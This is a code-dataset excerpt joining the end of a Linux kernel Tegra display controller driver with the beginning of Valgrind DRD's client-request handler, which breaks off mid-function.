tegra_dc_writel(dc, val, DC_CMD_INT_ENABLE);
}
#endif
}
bool tegra_dc_stats_get(struct tegra_dc *dc)
{
#if 0 /* right now it is always enabled */
u32 val;
bool res;
if (dc->enabled) {
val = tegra_dc_readl(dc, DC_CMD_INT_ENABLE);
res = !!(val & (WIN_A_UF_INT | WIN_B_UF_INT | WIN_C_UF_INT));
} else {
res = false;
}
return res;
#endif
return true;
}
/* make the screen blank by disabling all windows */
void tegra_dc_blank(struct tegra_dc *dc)
{
struct tegra_dc_win *dcwins[DC_N_WINDOWS];
unsigned i;
for (i = 0; i < DC_N_WINDOWS; i++) {
dcwins[i] = tegra_dc_get_window(dc, i);
dcwins[i]->flags &= ~TEGRA_WIN_FLAG_ENABLED;
}
tegra_dc_update_windows(dcwins, DC_N_WINDOWS);
tegra_dc_sync_windows(dcwins, DC_N_WINDOWS);
}
static void _tegra_dc_disable(struct tegra_dc *dc)
{
if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE) {
mutex_lock(&dc->one_shot_lock);
cancel_delayed_work_sync(&dc->one_shot_work);
}
tegra_dc_io_start(dc);
_tegra_dc_controller_disable(dc);
tegra_dc_io_end(dc);
tegra_dc_powergate_locked(dc);
if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE)
mutex_unlock(&dc->one_shot_lock);
/*
* We will need to reinitialize the display the next time panel
* is enabled.
*/
dc->out->flags &= ~TEGRA_DC_OUT_INITIALIZED_MODE;
}
void tegra_dc_disable(struct tegra_dc *dc)
{
tegra_dc_ext_disable(dc->ext);
/* it's important that new underflow work isn't scheduled before the
* lock is acquired. */
cancel_delayed_work_sync(&dc->underflow_work);
mutex_lock(&dc->lock);
if (dc->enabled) {
dc->enabled = false;
if (!dc->suspended)
_tegra_dc_disable(dc);
}
#ifdef CONFIG_SWITCH
switch_set_state(&dc->modeset_switch, 0);
#endif
mutex_unlock(&dc->lock);
synchronize_irq(dc->irq);
trace_display_mode(dc, &dc->mode);
}
#ifdef CONFIG_ARCH_TEGRA_2x_SOC
static void tegra_dc_reset_worker(struct work_struct *work)
{
struct tegra_dc *dc =
container_of(work, struct tegra_dc, reset_work);
unsigned long val = 0;
mutex_lock(&shared_lock);
dev_warn(&dc->ndev->dev,
"overlay stuck in underflow state. resetting.\n");
tegra_dc_ext_disable(dc->ext);
mutex_lock(&dc->lock);
if (dc->enabled == false)
goto unlock;
dc->enabled = false;
/*
* off host read bus
*/
val = tegra_dc_readl(dc, DC_CMD_CONT_SYNCPT_VSYNC);
val &= ~(0x00000100);
tegra_dc_writel(dc, val, DC_CMD_CONT_SYNCPT_VSYNC);
/*
* set DC to STOP mode
*/
tegra_dc_writel(dc, DISP_CTRL_MODE_STOP, DC_CMD_DISPLAY_COMMAND);
msleep(10);
_tegra_dc_controller_disable(dc);
/* _tegra_dc_controller_reset_enable deasserts reset */
_tegra_dc_controller_reset_enable(dc);
dc->enabled = true;
/* reopen host read bus */
val = tegra_dc_readl(dc, DC_CMD_CONT_SYNCPT_VSYNC);
val &= ~(0x00000100);
val |= 0x100;
tegra_dc_writel(dc, val, DC_CMD_CONT_SYNCPT_VSYNC);
unlock:
mutex_unlock(&dc->lock);
mutex_unlock(&shared_lock);
trace_display_reset(dc);
}
#endif
static void tegra_dc_underflow_worker(struct work_struct *work)
{
struct tegra_dc *dc = container_of(
to_delayed_work(work), struct tegra_dc, underflow_work);
mutex_lock(&dc->lock);
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
if (dc->enabled) {
tegra_dc_underflow_handler(dc);
}
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
}
#ifdef CONFIG_SWITCH
static ssize_t switch_modeset_print_mode(struct switch_dev *sdev, char *buf)
{
struct tegra_dc *dc =
container_of(sdev, struct tegra_dc, modeset_switch);
if (!sdev->state)
return sprintf(buf, "offline\n");
return sprintf(buf, "%dx%d\n", dc->mode.h_active, dc->mode.v_active);
}
#endif
static void tegra_dc_add_modes(struct tegra_dc *dc)
{
struct fb_monspecs specs;
int i;
memset(&specs, 0, sizeof(specs));
specs.max_x = dc->mode.h_active * 1000;
specs.max_y = dc->mode.v_active * 1000;
specs.modedb_len = dc->out->n_modes;
specs.modedb = kzalloc(specs.modedb_len *
sizeof(struct fb_videomode), GFP_KERNEL);
for (i = 0; i < dc->out->n_modes; i++)
tegra_dc_to_fb_videomode(&specs.modedb[i],
&dc->out->modes[i]);
tegra_fb_update_monspecs(dc->fb, &specs, NULL);
kfree(specs.modedb);
}
#if CONFIG_ESD_READ_TE
void tegra_dc_te_reset_lcd(void)
{
tegra_dc_dsi_reset_lcd(g_dc);
}
EXPORT_SYMBOL(tegra_dc_te_reset_lcd);
void tegra_run_resetwork(void)
{
schedule_work(&g_dc->reset_work_te);
}
static void tegra_reset_work(struct work_struct *work)
{
tegra_dc_te_reset_lcd();
}
#endif
static int tegra_dc_probe(struct platform_device *ndev)
{
struct tegra_dc *dc;
struct tegra_dc_mode *mode;
struct clk *clk;
struct clk *emc_clk;
struct resource *res;
struct resource *base_res;
struct resource *fb_mem = NULL;
int ret = 0;
void __iomem *base;
int irq;
int i;
if (!ndev->dev.platform_data) {
dev_err(&ndev->dev, "no platform data\n");
return -ENOENT;
}
dc = kzalloc(sizeof(struct tegra_dc), GFP_KERNEL);
if (!dc) {
dev_err(&ndev->dev, "can't allocate memory for tegra_dc\n");
return -ENOMEM;
}
irq = platform_get_irq_byname(ndev, "irq");
if (irq <= 0) {
dev_err(&ndev->dev, "no irq\n");
ret = -ENOENT;
goto err_free;
}
res = platform_get_resource_byname(ndev, IORESOURCE_MEM, "regs");
if (!res) {
dev_err(&ndev->dev, "no mem resource\n");
ret = -ENOENT;
goto err_free;
}
base_res = request_mem_region(res->start, resource_size(res),
ndev->name);
if (!base_res) {
dev_err(&ndev->dev, "request_mem_region failed\n");
ret = -EBUSY;
goto err_free;
}
base = ioremap(res->start, resource_size(res));
if (!base) {
dev_err(&ndev->dev, "registers can't be mapped\n");
ret = -EBUSY;
goto err_release_resource_reg;
}
if (TEGRA_DISPLAY_BASE == res->start) {
dc->vblank_syncpt = NVSYNCPT_VBLANK0;
dc->win_syncpt[0] = NVSYNCPT_DISP0_A;
dc->win_syncpt[1] = NVSYNCPT_DISP0_B;
dc->win_syncpt[2] = NVSYNCPT_DISP0_C;
dc->powergate_id = TEGRA_POWERGATE_DISA;
} else if (TEGRA_DISPLAY2_BASE == res->start) {
dc->vblank_syncpt = NVSYNCPT_VBLANK1;
dc->win_syncpt[0] = NVSYNCPT_DISP1_A;
dc->win_syncpt[1] = NVSYNCPT_DISP1_B;
dc->win_syncpt[2] = NVSYNCPT_DISP1_C;
dc->powergate_id = TEGRA_POWERGATE_DISB;
} else {
dev_err(&ndev->dev,
"Unknown base address %#08x: unable to assign syncpt\n",
res->start);
}
fb_mem = platform_get_resource_byname(ndev, IORESOURCE_MEM, "fbmem");
clk = clk_get(&ndev->dev, NULL);
if (IS_ERR_OR_NULL(clk)) {
dev_err(&ndev->dev, "can't get clock\n");
ret = -ENOENT;
goto err_iounmap_reg;
}
emc_clk = clk_get(&ndev->dev, "emc");
if (IS_ERR_OR_NULL(emc_clk)) {
dev_err(&ndev->dev, "can't get emc clock\n");
ret = -ENOENT;
goto err_put_clk;
}
dc->clk = clk;
dc->emc_clk = emc_clk;
dc->shift_clk_div.mul = dc->shift_clk_div.div = 1;
/* Initialize one shot work delay, it will be assigned by dsi
* according to refresh rate later. */
dc->one_shot_delay_ms = 40;
dc->base_res = base_res;
dc->base = base;
dc->irq = irq;
dc->ndev = ndev;
dc->pdata = ndev->dev.platform_data;
/*
* The emc is a shared clock, it will be set based on
* the requirements for each user on the bus.
*/
dc->emc_clk_rate = 0;
mutex_init(&dc->lock);
mutex_init(&dc->one_shot_lock);
init_completion(&dc->frame_end_complete);
init_waitqueue_head(&dc->wq);
init_waitqueue_head(&dc->timestamp_wq);
#ifdef CONFIG_ARCH_TEGRA_2x_SOC
INIT_WORK(&dc->reset_work, tegra_dc_reset_worker);
#endif
#if CONFIG_ESD_READ_TE
{
static int initflag = 0;
if(initflag == 0)
{
INIT_WORK(&dc->reset_work_te, tegra_reset_work);
initflag = 1;
}
}
#endif
INIT_WORK(&dc->vblank_work, tegra_dc_vblank);
dc->vblank_ref_count = 0;
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
INIT_WORK(&dc->vpulse2_work, tegra_dc_vpulse2);
#endif
dc->vpulse2_ref_count = 0;
INIT_DELAYED_WORK(&dc->underflow_work, tegra_dc_underflow_worker);
INIT_DELAYED_WORK(&dc->one_shot_work, tegra_dc_one_shot_worker);
tegra_dc_init_lut_defaults(&dc->fb_lut);
dc->n_windows = DC_N_WINDOWS;
for (i = 0; i < dc->n_windows; i++) {
struct tegra_dc_win *win = &dc->windows[i];
win->idx = i;
win->dc = dc;
tegra_dc_init_csc_defaults(&win->csc);
tegra_dc_init_lut_defaults(&win->lut);
}
ret = tegra_dc_set(dc, ndev->id);
if (ret < 0) {
dev_err(&ndev->dev, "can't add dc\n");
goto err_put_emc_clk;
}
platform_set_drvdata(ndev, dc);
#ifdef CONFIG_SWITCH
dc->modeset_switch.name = dev_name(&ndev->dev);
dc->modeset_switch.state = 0;
dc->modeset_switch.print_state = switch_modeset_print_mode;
ret = switch_dev_register(&dc->modeset_switch);
if (ret < 0)
dev_err(&ndev->dev, "failed to register switch driver\n");
#endif
tegra_dc_feature_register(dc);
if (dc->pdata->default_out)
tegra_dc_set_out(dc, dc->pdata->default_out);
else
dev_err(&ndev->dev, "No default output specified. Leaving output disabled.\n");
dc->mode_dirty = false; /* ignore changes tegra_dc_set_out has done */
dc->ext = tegra_dc_ext_register(ndev, dc);
if (IS_ERR_OR_NULL(dc->ext)) {
dev_warn(&ndev->dev, "Failed to enable Tegra DC extensions.\n");
dc->ext = NULL;
}
/* interrupt handler must be registered before tegra_fb_register() */
if (request_threaded_irq(irq, NULL, tegra_dc_irq, IRQF_ONESHOT,
dev_name(&ndev->dev), dc)) {
dev_err(&ndev->dev, "request_irq %d failed\n", irq);
ret = -EBUSY;
goto err_disable_dc;
}
disable_dc_irq(dc);
if (dc->pdata->flags & TEGRA_DC_FLAG_ENABLED) {
_tegra_dc_set_default_videomode(dc);
dc->enabled = _tegra_dc_enable(dc);
}
tegra_dc_create_debugfs(dc);
dev_info(&ndev->dev, "probed\n");
if (dc->pdata->fb) {
if (dc->enabled && dc->pdata->fb->bits_per_pixel == -1) {
unsigned long fmt;
tegra_dc_writel(dc,
WINDOW_A_SELECT << dc->pdata->fb->win,
DC_CMD_DISPLAY_WINDOW_HEADER);
fmt = tegra_dc_readl(dc, DC_WIN_COLOR_DEPTH);
dc->pdata->fb->bits_per_pixel =
tegra_dc_fmt_bpp(fmt);
}
mode = tegra_dc_get_override_mode(dc);
if (mode) {
dc->pdata->fb->xres = mode->h_active;
dc->pdata->fb->yres = mode->v_active;
}
tegra_dc_io_start(dc);
dc->fb = tegra_fb_register(ndev, dc, dc->pdata->fb, fb_mem);
tegra_dc_io_end(dc);
if (IS_ERR_OR_NULL(dc->fb)) {
dc->fb = NULL;
dev_err(&ndev->dev, "failed to register fb\n");
goto err_remove_debugfs;
}
}
if (dc->out && dc->out->n_modes)
tegra_dc_add_modes(dc);
if (dc->out && dc->out->hotplug_init)
dc->out->hotplug_init(&ndev->dev);
if (dc->out_ops && dc->out_ops->detect)
dc->out_ops->detect(dc);
else
dc->connected = true;
/* Powergate display module when it's unconnected. */
if (!tegra_dc_get_connected(dc))
tegra_dc_powergate_locked(dc);
tegra_dc_create_sysfs(&dc->ndev->dev);
return 0;
err_remove_debugfs:
tegra_dc_remove_debugfs(dc);
free_irq(irq, dc);
err_disable_dc:
if (dc->ext) {
tegra_dc_ext_disable(dc->ext);
tegra_dc_ext_unregister(dc->ext);
}
mutex_lock(&dc->lock);
if (dc->enabled)
_tegra_dc_disable(dc);
dc->enabled = false;
mutex_unlock(&dc->lock);
#ifdef CONFIG_SWITCH
switch_dev_unregister(&dc->modeset_switch);
#endif
err_put_emc_clk:
clk_put(emc_clk);
err_put_clk:
clk_put(clk);
err_iounmap_reg:
iounmap(base);
if (fb_mem)
release_resource(fb_mem);
err_release_resource_reg:
release_resource(base_res);
err_free:
kfree(dc);
return ret;
}
static int __devexit tegra_dc_remove(struct platform_device *ndev)
{
struct tegra_dc *dc = platform_get_drvdata(ndev);
tegra_dc_remove_sysfs(&dc->ndev->dev);
tegra_dc_remove_debugfs(dc);
if (dc->fb) {
tegra_fb_unregister(dc->fb);
if (dc->fb_mem)
release_resource(dc->fb_mem);
}
tegra_dc_ext_disable(dc->ext);
if (dc->ext)
tegra_dc_ext_unregister(dc->ext);
mutex_lock(&dc->lock);
if (dc->enabled)
_tegra_dc_disable(dc);
dc->enabled = false;
mutex_unlock(&dc->lock);
synchronize_irq(dc->irq); /* wait for IRQ handlers to finish */
#ifdef CONFIG_SWITCH
switch_dev_unregister(&dc->modeset_switch);
#endif
free_irq(dc->irq, dc);
clk_put(dc->emc_clk);
clk_put(dc->clk);
iounmap(dc->base);
if (dc->fb_mem)
release_resource(dc->base_res);
kfree(dc);
tegra_dc_set(NULL, ndev->id);
return 0;
}
#ifdef CONFIG_PM
static int tegra_dc_suspend(struct platform_device *ndev, pm_message_t state)
{
struct tegra_dc *dc = platform_get_drvdata(ndev);
trace_display_suspend(dc);
dev_info(&ndev->dev, "suspend\n");
tegra_dc_ext_disable(dc->ext);
mutex_lock(&dc->lock);
tegra_dc_io_start(dc);
if (dc->out_ops && dc->out_ops->suspend)
dc->out_ops->suspend(dc);
if (dc->enabled) {
_tegra_dc_disable(dc);
dc->suspended = true;
}
if (dc->out && dc->out->postsuspend) {
dc->out->postsuspend();
if (dc->out->type && dc->out->type == TEGRA_DC_OUT_HDMI)
/*
* avoid resume event due to voltage falling
*/
msleep(100);
}
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
synchronize_irq(dc->irq); /* wait for IRQ handlers to finish */
return 0;
}
static int tegra_dc_resume(struct platform_device *ndev)
{
struct tegra_dc *dc = platform_get_drvdata(ndev);
trace_display_resume(dc);
dev_info(&ndev->dev, "resume\n");
mutex_lock(&dc->lock);
dc->suspended = false;
/* To pan the fb on resume */
tegra_fb_pan_display_reset(dc->fb);
if (dc->enabled) {
dc->enabled = false;
_tegra_dc_set_default_videomode(dc);
dc->enabled = _tegra_dc_enable(dc);
}
if (dc->out && dc->out->hotplug_init)
dc->out->hotplug_init(&ndev->dev);
if (dc->out_ops && dc->out_ops->resume)
dc->out_ops->resume(dc);
mutex_unlock(&dc->lock);
return 0;
}
#endif /* CONFIG_PM */
static void tegra_dc_shutdown(struct platform_device *ndev)
{
struct tegra_dc *dc = platform_get_drvdata(ndev);
if (!dc || !dc->enabled)
return;
tegra_dc_blank(dc);
tegra_dc_disable(dc);
}
extern int suspend_set(const char *val, struct kernel_param *kp)
{
if (!strcmp(val, "dump"))
dump_regs(tegra_dcs[0]);
#ifdef CONFIG_PM
else if (!strcmp(val, "suspend"))
tegra_dc_suspend(tegra_dcs[0]->ndev, PMSG_SUSPEND);
else if (!strcmp(val, "resume"))
tegra_dc_resume(tegra_dcs[0]->ndev);
#endif
return 0;
}
extern int suspend_get(char *buffer, struct kernel_param *kp)
{
return 0;
}
int suspend;
module_param_call(suspend, suspend_set, suspend_get, &suspend, 0644);
struct platform_driver tegra_dc_driver = {
.driver = {
.name = "tegradc",
.owner = THIS_MODULE,
},
.probe = tegra_dc_probe,
.remove = tegra_dc_remove,
#ifdef CONFIG_PM
.suspend = tegra_dc_suspend,
.resume = tegra_dc_resume,
#endif
.shutdown = tegra_dc_shutdown,
};
#ifndef MODULE
static int __init parse_disp_params(char *options, struct tegra_dc_mode *mode)
{
int i, params[11];
char *p;
for (i = 0; i < ARRAY_SIZE(params); i++) {
if ((p = strsep(&options, ",")) != NULL) {
if (*p)
params[i] = simple_strtoul(p, &p, 10);
} else
return -EINVAL;
}
if ((mode->pclk = params[0]) == 0)
return -EINVAL;
mode->h_active = params[1];
mode->v_active = params[2];
mode->h_ref_to_sync = params[3];
mode->v_ref_to_sync = params[4];
mode->h_sync_width = params[5];
mode->v_sync_width = params[6];
mode->h_back_porch = params[7];
mode->v_back_porch = params[8];
mode->h_front_porch = params[9];
mode->v_front_porch = params[10];
return 0;
}
static int __init tegra_dc_mode_override(char *str)
{
char *p = str, *options;
if (!p || !*p)
return -EINVAL;
p = strstr(str, "hdmi:");
if (p) {
p += 5;
options = strsep(&p, ";");
if (parse_disp_params(options, &override_disp_mode[TEGRA_DC_OUT_HDMI]))
return -EINVAL;
}
p = strstr(str, "rgb:");
if (p) {
p += 4;
options = strsep(&p, ";");
if (parse_disp_params(options, &override_disp_mode[TEGRA_DC_OUT_RGB]))
return -EINVAL;
}
p = strstr(str, "dsi:");
if (p) {
p += 4;
options = strsep(&p, ";");
if (parse_disp_params(options, &override_disp_mode[TEGRA_DC_OUT_DSI]))
return -EINVAL;
}
return 0;
}
__setup("disp_params=", tegra_dc_mode_override);
#endif
static int __init tegra_dc_module_init(void)
{
int ret = tegra_dc_ext_module_init();
if (ret)
return ret;
return platform_driver_register(&tegra_dc_driver);
}
static void __exit tegra_dc_module_exit(void)
{
platform_driver_unregister(&tegra_dc_driver);
tegra_dc_ext_module_exit();
}
module_exit(tegra_dc_module_exit);
module_init(tegra_dc_module_init);
| gpl-2.0 |
percy-g2/Novathor_xperia_u8500 | 6.1.1.B.1.54/external/valgrind/main/drd/drd_clientreq.c | 3 | 16145 | /* -*- mode: C; c-basic-offset: 3; -*- */
/*
This file is part of drd, a thread error detector.
Copyright (C) 2006-2010 Bart Van Assche <bvanassche@acm.org>.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
02111-1307, USA.
The GNU General Public License is contained in the file COPYING.
*/
#include "drd_barrier.h"
#include "drd_clientreq.h"
#include "drd_cond.h"
#include "drd_error.h"
#include "drd_hb.h"
#include "drd_load_store.h"
#include "drd_malloc_wrappers.h"
#include "drd_mutex.h"
#include "drd_rwlock.h"
#include "drd_semaphore.h"
#include "drd_suppression.h" // drd_start_suppression()
#include "drd_thread.h"
#include "pub_tool_basics.h" // Bool
#include "pub_tool_debuginfo.h" // VG_(describe_IP)()
#include "pub_tool_libcassert.h"
#include "pub_tool_libcassert.h" // tl_assert()
#include "pub_tool_libcprint.h" // VG_(message)()
#include "pub_tool_machine.h" // VG_(get_SP)()
#include "pub_tool_threadstate.h"
#include "pub_tool_tooliface.h" // VG_(needs_...)()
/* Local function declarations. */
static Bool handle_client_request(ThreadId vg_tid, UWord* arg, UWord* ret);
/* Function definitions. */
/**
* Tell the Valgrind core the address of the DRD function that processes
* client requests. Must be called before any client code is run.
*/
void DRD_(clientreq_init)(void)
{
VG_(needs_client_requests)(handle_client_request);
}
/**
* DRD's handler for Valgrind client requests. The code below handles both
* DRD's public and tool-internal client requests.
*/
static Bool handle_client_request(ThreadId vg_tid, UWord* arg, UWord* ret)
{
UWord result = 0;
const DrdThreadId drd_tid = DRD_(thread_get_running_tid)();
tl_assert(vg_tid == VG_(get_running_tid()));
tl_assert(DRD_(VgThreadIdToDrdThreadId)(vg_tid) == drd_tid);
switch (arg[0])
{
case VG_USERREQ__MALLOCLIKE_BLOCK:
if (arg[1])
DRD_(malloclike_block)(vg_tid, arg[1]/*addr*/, arg[2]/*size*/);
break;
case VG_USERREQ__FREELIKE_BLOCK:
if (arg[1] && ! DRD_(freelike_block)(vg_tid, arg[1]/*addr*/))
{
GenericErrInfo GEI = {
.tid = DRD_(thread_get_running_tid)(),
.addr = 0,
};
VG_(maybe_record_error)(vg_tid,
GenericErr,
VG_(get_IP)(vg_tid),
"Invalid VG_USERREQ__FREELIKE_BLOCK request",
&GEI);
}
break;
case VG_USERREQ__DRD_GET_VALGRIND_THREAD_ID:
result = vg_tid;
break;
case VG_USERREQ__DRD_GET_DRD_THREAD_ID:
result = drd_tid;
break;
case VG_USERREQ__DRD_SET_THREAD_NAME:
DRD_(thread_set_name)(drd_tid, (const char*)arg[1]);
break;
case VG_USERREQ__DRD_START_SUPPRESSION:
/*_VG_USERREQ__HG_ARANGE_MAKE_UNTRACKED*/
case VG_USERREQ_TOOL_BASE('H','G') + 256 + 39:
DRD_(start_suppression)(arg[1], arg[1] + arg[2], "client");
break;
case VG_USERREQ__DRD_FINISH_SUPPRESSION:
/*_VG_USERREQ__HG_ARANGE_MAKE_TRACKED*/
case VG_USERREQ_TOOL_BASE('H','G') + 256 + 40:
DRD_(finish_suppression)(arg[1], arg[1] + arg[2]);
break;
case VG_USERREQ__DRD_ANNOTATE_HAPPENS_BEFORE:
DRD_(hb_happens_before)(drd_tid, arg[1]);
break;
case VG_USERREQ__DRD_ANNOTATE_HAPPENS_AFTER:
DRD_(hb_happens_after)(drd_tid, arg[1]);
break;
case VG_USERREQ__DRD_ANNOTATE_RWLOCK_CREATE:
if (arg[1])
{
struct mutex_info* const mutex_p = DRD_(mutex_get)(arg[1]);
if (mutex_p && mutex_p->mutex_type == mutex_type_spinlock)
break;
}
DRD_(rwlock_pre_init)(arg[1], user_rwlock);
break;
case VG_USERREQ__DRD_ANNOTATE_RWLOCK_DESTROY:
if (arg[1])
{
struct mutex_info* const mutex_p = DRD_(mutex_get)(arg[1]);
if (mutex_p && mutex_p->mutex_type == mutex_type_spinlock)
break;
}
DRD_(rwlock_post_destroy)(arg[1], user_rwlock);
break;
case VG_USERREQ__DRD_ANNOTATE_RWLOCK_ACQUIRED:
if (arg[1])
{
struct mutex_info* const mutex_p = DRD_(mutex_get)(arg[1]);
if (mutex_p && mutex_p->mutex_type == mutex_type_spinlock)
break;
}
tl_assert(arg[2] == !! arg[2]);
if (arg[2])
{
DRD_(rwlock_pre_wrlock)(arg[1], user_rwlock);
DRD_(rwlock_post_wrlock)(arg[1], user_rwlock, True);
}
else
{
DRD_(rwlock_pre_rdlock)(arg[1], user_rwlock);
DRD_(rwlock_post_rdlock)(arg[1], user_rwlock, True);
}
break;
case VG_USERREQ__DRD_ANNOTATE_RWLOCK_RELEASED:
if (arg[1])
{
struct mutex_info* const mutex_p = DRD_(mutex_get)(arg[1]);
if (mutex_p && mutex_p->mutex_type == mutex_type_spinlock)
break;
}
tl_assert(arg[2] == !! arg[2]);
DRD_(rwlock_pre_unlock)(arg[1], user_rwlock);
break;
case VG_USERREQ__SET_PTHREAD_COND_INITIALIZER:
DRD_(pthread_cond_initializer) = (Addr)arg[1];
DRD_(pthread_cond_initializer_size) = arg[2];
break;
case VG_USERREQ__DRD_START_NEW_SEGMENT:
DRD_(thread_new_segment)(DRD_(PtThreadIdToDrdThreadId)(arg[1]));
break;
case VG_USERREQ__DRD_START_TRACE_ADDR:
DRD_(start_tracing_address_range)(arg[1], arg[1] + arg[2]);
break;
case VG_USERREQ__DRD_STOP_TRACE_ADDR:
DRD_(stop_tracing_address_range)(arg[1], arg[1] + arg[2]);
break;
case VG_USERREQ__DRD_RECORD_LOADS:
DRD_(thread_set_record_loads)(drd_tid, arg[1]);
break;
case VG_USERREQ__DRD_RECORD_STORES:
DRD_(thread_set_record_stores)(drd_tid, arg[1]);
break;
case VG_USERREQ__SET_PTHREADID:
// pthread_self() returns 0 for programs not linked with libpthread.so.
if (arg[1] != INVALID_POSIX_THREADID)
DRD_(thread_set_pthreadid)(drd_tid, arg[1]);
break;
case VG_USERREQ__SET_JOINABLE:
DRD_(thread_set_joinable)(DRD_(PtThreadIdToDrdThreadId)(arg[1]),
(Bool)arg[2]);
break;
case VG_USERREQ__ENTERING_PTHREAD_CREATE:
DRD_(thread_entering_pthread_create)(drd_tid);
break;
case VG_USERREQ__LEFT_PTHREAD_CREATE:
DRD_(thread_left_pthread_create)(drd_tid);
break;
case VG_USERREQ__POST_THREAD_JOIN:
{
const DrdThreadId thread_to_join = DRD_(PtThreadIdToDrdThreadId)(arg[1]);
if (thread_to_join == DRD_INVALID_THREADID)
{
InvalidThreadIdInfo ITI = { DRD_(thread_get_running_tid)(), arg[1] };
VG_(maybe_record_error)(vg_tid,
InvalidThreadId,
VG_(get_IP)(vg_tid),
"pthread_join(): invalid thread ID",
&ITI);
}
else
{
DRD_(thread_post_join)(drd_tid, thread_to_join);
}
break;
}
case VG_USERREQ__PRE_THREAD_CANCEL:
{
const DrdThreadId thread_to_cancel =DRD_(PtThreadIdToDrdThreadId)(arg[1]);
if (thread_to_cancel == DRD_INVALID_THREADID)
{
InvalidThreadIdInfo ITI = { DRD_(thread_get_running_tid)(), arg[1] };
VG_(maybe_record_error)(vg_tid,
InvalidThreadId,
VG_(get_IP)(vg_tid),
"pthread_cancel(): invalid thread ID",
&ITI);
}
else
{
DRD_(thread_pre_cancel)(thread_to_cancel);
}
break;
}
case VG_USERREQ__POST_THREAD_CANCEL:
break;
case VG_USERREQ__PRE_MUTEX_INIT:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(mutex_init)(arg[1], arg[2]);
break;
case VG_USERREQ__POST_MUTEX_INIT:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_MUTEX_DESTROY:
DRD_(thread_enter_synchr)(drd_tid);
break;
case VG_USERREQ__POST_MUTEX_DESTROY:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(mutex_post_destroy)(arg[1]);
break;
case VG_USERREQ__PRE_MUTEX_LOCK:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(mutex_pre_lock)(arg[1], arg[2], arg[3]);
break;
case VG_USERREQ__POST_MUTEX_LOCK:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(mutex_post_lock)(arg[1], arg[2], False/*post_cond_wait*/);
break;
case VG_USERREQ__PRE_MUTEX_UNLOCK:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(mutex_unlock)(arg[1], arg[2]);
break;
case VG_USERREQ__POST_MUTEX_UNLOCK:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_SPIN_INIT_OR_UNLOCK:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(spinlock_init_or_unlock)(arg[1]);
break;
case VG_USERREQ__POST_SPIN_INIT_OR_UNLOCK:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_COND_INIT:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(cond_pre_init)(arg[1]);
break;
case VG_USERREQ__POST_COND_INIT:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_COND_DESTROY:
DRD_(thread_enter_synchr)(drd_tid);
break;
case VG_USERREQ__POST_COND_DESTROY:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(cond_post_destroy)(arg[1]);
break;
case VG_USERREQ__PRE_COND_WAIT:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
{
const Addr cond = arg[1];
const Addr mutex = arg[2];
const MutexT mutex_type = arg[3];
DRD_(mutex_unlock)(mutex, mutex_type);
DRD_(cond_pre_wait)(cond, mutex);
}
break;
case VG_USERREQ__POST_COND_WAIT:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
{
const Addr cond = arg[1];
const Addr mutex = arg[2];
const Bool took_lock = arg[3];
DRD_(cond_post_wait)(cond);
DRD_(mutex_post_lock)(mutex, took_lock, True);
}
break;
case VG_USERREQ__PRE_COND_SIGNAL:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(cond_pre_signal)(arg[1]);
break;
case VG_USERREQ__POST_COND_SIGNAL:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_COND_BROADCAST:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(cond_pre_broadcast)(arg[1]);
break;
case VG_USERREQ__POST_COND_BROADCAST:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_SEM_INIT:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(semaphore_init)(arg[1], arg[2], arg[3]);
break;
case VG_USERREQ__POST_SEM_INIT:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_SEM_DESTROY:
DRD_(thread_enter_synchr)(drd_tid);
break;
case VG_USERREQ__POST_SEM_DESTROY:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(semaphore_destroy)(arg[1]);
break;
case VG_USERREQ__PRE_SEM_OPEN:
DRD_(thread_enter_synchr)(drd_tid);
break;
case VG_USERREQ__POST_SEM_OPEN:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(semaphore_open)(arg[1], (Char*)arg[2], arg[3], arg[4], arg[5]);
break;
case VG_USERREQ__PRE_SEM_CLOSE:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(semaphore_close)(arg[1]);
break;
case VG_USERREQ__POST_SEM_CLOSE:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_SEM_WAIT:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(semaphore_pre_wait)(arg[1]);
break;
case VG_USERREQ__POST_SEM_WAIT:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
